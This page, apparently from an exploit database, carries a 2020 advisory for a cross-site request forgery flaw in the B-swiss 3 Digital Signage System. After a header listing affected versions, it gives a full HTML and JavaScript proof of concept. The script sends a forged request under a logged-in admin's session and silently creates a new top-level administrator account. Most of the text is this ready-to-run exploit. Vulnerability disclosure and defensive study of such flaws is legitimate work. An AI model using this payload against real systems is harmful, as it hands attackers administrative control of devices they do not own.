0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
B-swiss 3 Digital Signage System 3.6.5 Cross Site Request Forgery Vulnerability
[<!--
B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin
Vendor: B-Swiss SARL | b-tween Sarl
Product web page: https://www.b-swiss.com
Affected version: 3.6.5
3.6.2
3.6.1
3.6.0
3.5.80
3.5.40
3.5.20
3.5.00
3.2.00
3.1.00
Summary: Intelligent digital signage made easy. To go beyond the
possibilities offered, b-swiss allows you to create the communication
solution for your specific needs and your graphic charter. You benefit
from our experience and know-how in the realization of your digital
signage project.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 5.3.0-46-generic x86_64
Linux 4.15.0-20-generic x86_64
Linux 4.9.78-xxxx-std-ipv6-64
Linux 4.7.0-040700-generic x86_64
Linux 4.2.0-27-generic x86_64
Linux 3.19.0-47-generic x86_64
Linux 2.6.32-5-amd64 x86_64
Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
macOS 10.13.5
Microsoft Windows 7 Business Edition SP1 i586
Apache/2.4.29 (Ubuntu)
Apache/2.4.18 (Ubuntu)
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Win64)
Apache/2.4.18 (Ubuntu)
Apache/2.2.16 (Debian)
PHP/7.2.24-0ubuntu0.18.04.6
PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
PHP/5.6.31
PHP/5.6.30-10+deb.sury.org~xenial+2
PHP/5.5.9-1ubuntu4.17
PHP/5.5.9-1ubuntu4.14
PHP/5.3.10
PHP/5.3.13
PHP/5.3.3-7+squeeze16
PHP/5.3.3-7+squeeze17
MySQL/5.5.49
MySQL/5.5.47
MySQL/5.5.40
MySQL/5.5.30
MySQL/5.1.66
MySQL/5.1.49
MySQL/5.0.77
MySQL/5.0.12-dev
MySQL/5.0.11-dev
MySQL/5.0.8-dev
phpMyAdmin/3.5.7
phpMyAdmin/3.4.10.1deb1
phpMyAdmin/3.4.7
phpMyAdmin/3.3.7deb7
WampServer 3.2.0
Acore Framework 2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5589
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php
13.06.2020
-->
<html>
<body>
<h1>CSRF Add b-swiss Maintenance Admin</h1>
<script>
function GodMode()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"locator\"\r\n" +
"\r\n" +
"Users.Save\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"page\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"sort\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"id\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"ischildgrid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"inpopup\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"ongridpage\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rowid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"preview_screenid\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_firstname\"\r\n" +
"\r\n" +
"TestingusF\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_lastname\"\r\n" +
"\r\n" +
"TestingusL\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_email\"\r\n" +
"\r\n" +
"aa@bb.cc\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_username\"\r\n" +
"\r\n" +
"testingus\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_password\"\r\n" +
"\r\n" +
"123456\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" +
"\r\n" +
"123456\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" +
"\r\n" +
"100000\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_status\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_language\"\r\n" +
"\r\n" +
"french-sw\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" +
"\r\n" +
"2\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
"Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Press me" onclick="GodMode();" />
</form>
</body>
</html>
# 0day.today [2024-11-15] #